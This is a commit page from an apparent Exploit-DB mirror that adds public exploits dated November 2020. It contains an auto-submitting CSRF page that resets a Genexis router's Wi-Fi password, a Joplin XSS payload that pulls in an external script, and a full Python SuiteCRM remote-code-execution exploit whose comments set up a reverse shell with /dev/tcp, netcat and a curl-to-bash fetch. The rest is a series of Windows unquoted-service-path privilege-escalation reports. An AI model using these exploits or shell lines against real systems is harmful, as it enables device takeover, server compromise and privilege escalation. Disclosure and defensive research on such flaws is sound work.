bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-10

Browse source 
24 changes to exploits/shellcodes

HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path
Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
Magic Mouse 2 utilities  2.20 - 'magicmouse2service' Unquoted Service Path
iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE'  - Unquoted Service Path
Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
Joplin 1.2.6 - 'link' Cross Site Scripting
This commit is contained in:
Offensive Security 2020-11-10 05:02:05 +00:00
parent 690eb17718
commit e797f5230d
25 changed files with 1012 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

90
exploits/hardware/webapps/49000.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
# Date: 28-08-2020
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
# Version: v2.1 (software version P4410-V2-1.28)
# CVE : CVE-2020-25015
1. Description
Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access points password.
2. Impact
An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the routers web-based setup page (192.168.1.1), essentially making this a one-click hack.
3. Proof of Concept
Create an HTML file with the following code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N&#47;A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht&#95;bw" value="1" />
<input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID&#95;Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb&#95;enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap&#45;pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save&#95;Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
3. Timeline
Vulnerability reported to the Genexis team August 28, 2020
Team confirmed firmware release containing fix September 14, 2020

23
exploits/multiple/webapps/49024.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to
bypass the HTML filter
# 2. PoC
# Paste the following payload into a note:
```
<link rel=import
href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```

113
exploits/php/webapps/49001.py Executable file
View file

@ -0,0 +1,113 @@
# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE
from requests import Session
from random import choice
from string import ascii_lowercase
url = "http://127.0.0.1/" # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin" # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
prefix=prefix,
rand=''.join(choice(ascii_lowercase) for _ in range(6))
)
# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)
# Admin login payload
login_data = {
"module": "Users",
"action": "Authenticate",
"return_module": "Users",
"return_action": "Login",
"user_name": user_name,
"username_password": password,
"Login": "Log+In"
}
# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here
"logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one.
"logger_level": (None, "info"), # This is important for your php code to make it into the logs
"save": (None, "Save")
}
# Payload to put php code into the malicious log file
poison_log = {
"module": (None, "Users"),
"record": (None, "1"),
"action": (None, "Save"),
"page": (None, "EditView"),
"return_action": (None, "DetailView"),
"user_name": (None, user_name),
"last_name": (None, command),
}
# Payload to restore the log file settings to default after the exploit runs
restore_log = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, "suitecrm"), # Default log file name
"logger_file_ext": (None, ".log"), # Default log file extension
"logger_level": (None, "fatal"), # Default log file setting
"save": (None, "Save")
}
# Start of exploit
with Session() as s:
# Authenticating as the administrator
s.get(post_url, params={'module': 'Users', 'action': 'Login'})
print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
s.post(post_url, data=login_data)
if 'ck_login_id_20' not in s.cookies.get_dict().keys():
print('[-] Invalid password for: {user}'.format(user=user_name))
exit(1)
print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
user=user_name,
cookie=s.cookies.get_dict()['PHPSESSID'])
)
# Modify the system settings to set logging to 'info' and create a log file in php format
print('[+] Modifying log level and log file name.')
print('[+] File name will be: {fname}'.format(fname=file_name))
settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(post_url, headers=settings_header, files=modify_system_settings_data)
# Post to update the administrator's last name with php code that will poison the log file
print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(url, headers=command_header, files=poison_log)
# May be a good idea to put a short delay in here to allow your code to make it into the logfile.
# Up to you though...
# Do a get request to trigger php code execution.
print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
if not execute_command.ok:
print('[-] Exploit failed, sorry... Might have to do some modifications.')
# Restoring log file to default
print('[+] Setting log back to defaults')
s.post(post_url, headers=settings_header, files=restore_log)
print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))

39
exploits/windows/local/49002.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.portrait.com/
# Software Link: https://www.portrait.com/dtune/hwp/enu/
# Software Version: 3.20
# File Version: 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname
DisplayName Name PathName StartMode StartName
Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "DTSRVC"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DTSRVC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Portrait Displays Display Tune Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

24
exploits/windows/local/49003.txt Normal file
View file

@ -0,0 +1,24 @@
#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : KMSpico
#Version : Service_KMS 17.1.0.0
#Vendor Homepage : https://official-kmspico.com/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Service KMSELDI"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Service KMSELDI
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Service KMSELDI
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

24
exploits/windows/local/49004.txt Normal file
View file

@ -0,0 +1,24 @@
#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Winstep
#Version : WsxService 18.06.0096
#Vendor Homepage : https://www.winstep.net/xtreme.asp
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Winstep Xtreme Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Winstep Xtreme Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Winstep Xtreme Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

39
exploits/windows/local/49005.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.oki.com/
# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
# Software Version: 1.0.41
# File Version: 1.4.2.0
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "sPSVOpLclSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: sPSVOpLclSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : OKI sPSV Port Manager
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

27
exploits/windows/local/49006.txt Normal file
View file

@ -0,0 +1,27 @@
#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : HTC
#Version : IPTInstaller 4.0.9
#Vendor Homepage : https://www.htc.com/latam/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\Users\DSAZ230>sc qc "PassThru Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PassThru Service
TIPO : 10
[image: PassThruserv.jpg]
WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet
Pass-Through\PassThruSvr.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Internet Pass-Through Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

27
exploits/windows/local/49007.txt Normal file
View file

@ -0,0 +1,27 @@
#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Genexus
#Version : Genexus Protection Server 9.6.4.2
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro
#Analyze PoC :
==============
C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: protsrvservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common
Files\Artech\GXProt1\ProtSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ProtSrvService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

25
exploits/windows/local/49008.txt Normal file
View file

@ -0,0 +1,25 @@
#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : DigitalPersona U. are U. One Touch
#Version : DigitalPersona Pro 4.5.0.2213
#Vendor Homepage : https://www.hidglobal.com/crossmatch
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\>sc qc DpHost
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DpHost
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\DigitalPersona\Bin\DpHostW.exe
GRUPO_ORDEN_CARGA : BiometricGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Servicio de autenticación biométrica
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

38
exploits/windows/local/49009.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.syncplify.me/
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
# Version: 5.0.37
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "SMWebRestServicev5"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SMWebRestServicev5
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

40
exploits/windows/local/49010.txt Normal file
View file

@ -0,0 +1,40 @@
#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
#Discovery by: Jocelyn Arenas
#Discovery Date: 2020-11-07
#Vendor Homepage: https://www8.hp.com/mx/es/home.html
#Tested Version: 1.4.8.0
#Vulnerability Type: Unquoted Service Path
#Tested on OS: Windows 10 Home x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto
#Service info:
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

48
exploits/windows/local/49011.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-08
# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/
# Tested Version: 2.4.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " |
findstr /i /v """
Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
Device Manager\MotoHelperService.exe
Auto
# Service info:
PST Service C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
Auto
C:\>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PST Service
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : PST Service
DEPENDENCIAS : lanmanworkstation
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.

44
exploits/windows/local/49012.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " |
findstr /i /v """
Motorola Device Manager Service
Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola
Device Manager\MotoHelperService.exe
Auto
# Service info:
C:\>sc qc "Motorola Device Manager"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Motorola Device Manager
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola
Mobility\Motorola Device Manager\MotoHelperService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Motorola Device Manager Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.

40
exploits/windows/local/49013.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe 'Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForwardDaemon" |
findstr /i /v """
PST Service C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
Auto
C:\Users\MISTI>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PST Service
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : PST Service
DEPENDENCIAS : lanmanworkstation
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would cause the local user to be able to insert their
code in the system root path
undetected by the OS or other security applications and elevate his
privileges after reboot.

34
exploits/windows/local/49014.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.64.10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
Andrea RT Filters Service AERTFilters C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE Auto
# Service info:
C:\>sc qc "AERTFilters"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AERTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea RT Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

24
exploits/windows/local/49016.txt Normal file
View file

@ -0,0 +1,24 @@
#Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Microvirt
#Version : Microvirt MEMU 3.7.0
#Vendor Homepage : https://www.memuplay.com/
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\Users\Sam Sanz>sc qc "MEmusvc"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: MEmusvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MEmusvc
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

26
exploits/windows/local/49017.txt Normal file
View file

@ -0,0 +1,26 @@
#Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Magic Utilities Pty
#Version : 64-bit 2.20
#Vendor Homepage : https://magicutilities.net/magic-mouse/home
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\>sc qc "magicmouse2service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: magicmouse2service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 -
Utilities\MagicMouse2Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Magic Mouse 2 Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

30
exploits/windows/local/49018.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
# Discovery by: Leslie Lara
# Discovery Date: 7-09-2020
# Vendor Homepage: https://www.huawei.com/en/corporate-information
# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm
# Tested Version: 3.0.2.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
iDeskService
iDeskService C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
Auto
C:\>sc qc "iDeskService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: iDeskService
